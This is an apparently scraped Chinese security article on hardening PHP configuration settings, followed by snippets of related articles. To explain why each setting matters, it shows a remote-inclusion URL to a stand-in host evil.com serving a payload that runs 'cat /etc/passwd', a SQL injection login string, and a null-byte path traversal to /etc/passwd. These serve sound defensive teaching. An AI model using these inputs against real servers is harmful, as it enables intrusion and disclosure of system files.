PHP安全相关的配置

PHP作为一门强大的脚本语言被越来越多的web应用程序采用,不规范的php安全配置可能会带来敏感信息泄漏、SQL注射、远程包含等问题,规范的安全配置可保障最基本的安全环境。下面我们分析几个会引发安全问题的PHP配置,并给出建议的选项。

1、register_globals = Off

PHP在进程启动时,会根据register_globals的设置,判断是否将$_GET、$_POST、$_COOKIE、$_ENV、$_SERVER、$REQUEST等数组变量里的内容自动注册为全局变量。

我们举个例子来说明register_globals = On时,会引发的安全问题:

<?php  
if (authenticated_user())
  $authorized = true;
?>

//  由于authorized 未被初始化,故而可能通过register_globals被定义

//  如 GET example.php?authorized=1
<?php if (!$authorized):

// 一些重要的操作,比如SetCookies

include(“SetCookies.php”);

?>

对于上述代码,由于PHP会自动的为每个提交的值创建一个变量,这样只要在请求中提交http://example.com/example.php?authorized=1,即可获得授权操作,为了避免出现这样的问题,建议将register_globals配置为Off。

2、allow_url_include =Off  

PHP通过此选项控制是否允许通过include/require来执行一个远程文件(如http://evil.com/evil.php或ftp://evil.com/evil.php)。

代码示例如下:

// http://HostA/test.php如下:

<?php

$strParam = $_GET[‘param‘];

if (!include_once($strParam.’.php’)){

echo “error”;

}

?>

// http://evil.com/evil.php示例如下:

<?php
   echo "<?php system(‘cat/etc/passwd‘); ?>"

?>

假如用户访问如下的URL,访问页面中的$strParam将被设置为一个远程的URL:http://evil.com/evil.php。如果此配置被设置为on,那么test.php会通过include_once执行远程服务器上的PHP文件(http://evil.com/evil.php),后果不言而喻。

http://HostA/test.php?param=http://evil.com/evil

所以建议此选项强制配置为Off。

当然要彻底解决上述代码的安全漏洞,除了规范PHP配置,还需要规范PHP编码。

3、magic_quotes_gpc = on  

举一个典型的SQL注入示例,假如SQL语句用如下方式拼接:

select * from user where pass=’ “. $_GET[‘passwd’]. ”‘ and user=‘” . $_GET[‘username’] .”‘;

假如用户提交一个login.php?passwd=p&username=’ or ‘1’=’1请求,代码中的SQL语句将变成:

这就造成一个SQL注入漏洞。避免此问题出现的正确思路是开发者在拼接SQL语句之前过滤所有接收的数值,并严格执行这种编码规范,但是并不是所有的开发者都会意识到这种问题的存在,而此时,如果将php.ini的magic_quotes_gpc设置为On时,PHP将对所有GPC参数($_GET,$_POST,$_COOKIE)进行addslashes处理[既转义单引号、双引号、反斜线和nullbyte],该SQL语句将是:

由于’已经被转义,SQL语句不能被成功执行,从而防止SQL注射。

另外,以小节2中的http://HostA/test.php为例,当magic_quotes_gpc= Off的情况下,用户提交一个example.php?param=../../../etc/passwd%00请求,由于代码中限制的文件后缀(.php)将被%00截断,就会通过require_once尝试读取/etc/passwd文件。

值得注意的是,magic_quotes_gpc配置为On时,有以下缺点:

1、     php此时会对所有GPC参数做addslashes处理,会有比较大的性能损耗。

2、     当GPC参数被用于其他操作如逻辑关系判断之前就必须先做strislashes处理,否则结果必然是不正确的。

考虑到开启此选项带来的性能损耗和代码的复杂化,可以在使用时灵活设置,对于一些不规范或者无人维护的代码,可以开启此选项;更好的做法是将此值设置为Off,由开发者严格过滤来自用户的输入。

4、expose_php = Off  

我们经常会在一个http头里发现这样的信息:

X-Powered-By:PHP/5.2.11

PHP的版本号暴露无疑,攻击者很容易捕获到此信息,要想解决此问题我们只要如下配置

;;;;;;;;;;;;;;;;;

; Miscellaneous ;

;;;;;;;;;;;;;;;;;

; Decides whether PHP may expose the fact thatit is installed on the server

; (e.g. by adding its signature to the Webserver header).  It is no security

; threat in any way, but it makes it possibleto determine whether you use PHP

; on your server or not.

; http://php.net/expose-php

expose_php = On

该配置项默认为On,需要修改为Off。

5、display_errors = Off

此控制项控制PHP是否将error、notice、warning日志打印出来,以及打印的位置。错误信息主要用于辅助开发,但是在线上环境却非常危险,因为这样将会把服务端的WebServer、数据库、PHP代码部署路径,甚至是数据库连接、数据表等关键信息暴露出去,为攻击者带来极大便利。所以建议产品上线时修改为Off。

6、error_reporting = E_ALL& ~E_NOTICE

此配置项控制PHP打印哪些错误日志(errors,warnings,notices)。默认情况下会打印所有的错误日志,线上环境我们应该不显示具体的E_NOTICE日志信息。

导致E_NOTICE错误的最普遍场景是——使用未经初始化的变量,以下述代码为例:

// 假如用户请求中无username 参数,则会打印notice错误

<?php

// 假如用户请求中无username 参数,则会打印notice错误

$username = $_GET[‘username’];

// 引用一个未初始化的变量var2

//  则会打印notice错误

$var1   = $var2;

?>

如果用户访问的url中没有指定username参数,则代码中$_GET[‘username’]就是一个未经初始化的变量,直接访问就会抛出一个NOTICE错误。上述代码执行会报如下错误,这样即泄漏了代码目录。

PHP Notice: Undefined index: username in /somepath/test.php on line 3

PHP Notice: Undefined variable: var2 in /somepath/test.php on line 6

攻击者会利用这些信息,猜测代码逻辑,使得攻击变得更方便。

7、display_startup_errors =Off  

php启动时产生的错误由此选项进行控制,这个和display_errors是分开的。为了避免PHP进城启动时产生的错误被打印到页面上而造成信息泄漏,此选项在线上服务也应该被配置为Off。

为了方便开发和调试,开发环境可以将其设置为On。

由此我们可以看出,正确的PHP基础安全配置可有效避免很多高危漏洞,避免泄漏服务器敏感信息,从而提升产品的安全性。

来源:网易安全中心

http://anquan.163.com/module/pedia/article-00031.html

时间: 2024-08-06 11:53:49

PHP安全相关的配置的相关文章

SEnginx安全相关模块配置

SEnginx官方主页http://www.senginx.org http {     #nginx原有配置     #定义一个10MB的内存用于SEnginx访问统计     statistics_zone 10m;      #开启全局IP黑名单     ip_blacklist on;     #存储的IP数量     ip_blacklist_size 10240;     #IP在黑名单保留时间(秒)     ip_blacklist_timeout 120;     #名单保存在S

DNS正反解析、主从复制、子域授权、安全相关配置

原理: 我们都知道,在"记忆"的角色上,人脑总是不如计算机,而人们对文字的印象又比数字高.因此,想要使用纯粹的TCP/IP来上网,实在不好记忆又很麻烦,为了适应人类的使用习惯,一个名为DNS的服务帮我们将主机名解析为IP好让大家只要记得主机名就能使用Internet,由于目前的IPv4已经接近分配完毕的阶段,因此128bits的IPv6会逐渐热门起来,如果背128位的IP上网想必是不可能的,可以想象它会越来越重要. 域名和服务概述 FQDN:Fully Qualified Domaim

DNS服务基础及bind基础配置和应用

DNS服务基础及bind基础配置和应用  DNS服务基础011.DNS:Domain   Name  Service,  ( 应用层协议)2.tld:Top Level Domain 顶级域(1)顶级域中的组织域.com  (company).net    网络组织.org非盈利型组织   org:other  organizations.gov  government.edu    教育机构.mil   military军事的,军队,军人...(2)顶级域中的国家域.tw   .hk  .cn

DNS子域授权、view配置详解

子域授权:其实就是将一个比较大的域再分割成小区域,每个小区域可以交由一组或多组服务器管理,这些服务器只解析其管辖范围内的域名,超出其范围的解析请求一般会转发给父域或直接转发给根域.子域是相对而言的,对于根来说顶级域名就是它的子域,依次类推,我们这里讲提到的子域授权是针对二级域名来说的,也就是三级域名授权. 正向区域的子域授权:使用胶水记录(glue record),也就是在父域中添加一条NS记录和一条A记录即可.如果客户端的请求超出子域的解析范文,那么我们就需要定义转发服务器. 定义转发服务器:

Redis 应用进阶

Redis 基础应用(二) ============================================================================== 概述: 安全相关的配置: 事务功能: connection(连接)及Server 相关的命令 发布与订阅(publish/subscribe) Redis的持久化 Redis的主从复制 Redis的sentinel机制 Redis的Clustering机制 ============================

Linux 第24天: (09月22日) Linux DNS

本章内容名字解析DNS服务实现主从服务器实现子域实现view编译安装压力测试DNS排错 DNS服务DNS: Domain Name Service,协议(C/S, 53/udp, 53/tcp)应用层协议BIND:BekerleyInternatName Domain, ISC (www.isc.org)本地名称解析配置文件:hosts/etc/hosts%WINDIR%/system32/drivers/etc/hosts1.1.1.1 www.magedu.com2.2.2.2 www.ap

DNS域名服务

DNS:Domain Name Service 域名服务 DNS协议     基于C/S架构  Client:发起应用请求的程序 Server:相应请求(提供服务)的程序; 名称解析: ID和名称之间的转换的过程 名称解析库:存放域名主机名的文件                                 DNS名称解析方式 正向解析和反向解析:其不在同一个名称空间,也非同一个解析库 正向解析过程 主机名到ip解析过程: 当一个客户端 DNS查询过程 迭代:服务器自己遍历分布式服务系统反馈客

linux服务之DNS(二)

DNS and Bind(2) BIND的安装配置: BIND: Berkeley Internet Name Domain,  ISC.org dns: 协议 bind: dns协议的一种实现 named:bind程序的运行的进程名 程序包: bind-libs:被bind和bind-utils包中的程序共同用到的库文件: bind-utils:bind客户端程序集,例如dig, host, nslookup等: bind:提供的dns server程序.以及几个常用的测试程序: bind-c

Flume官方文档翻译——Flume 1.7.0 User Guide (unreleased version)(二)

Flume官方文档翻译--Flume 1.7.0 User Guide (unreleased version)(一) Logging raw data(记录原始数据) Logging the raw stream of data flowing through the ingest pipeline is not desired behaviour in many production environments because this may result in leaking sensit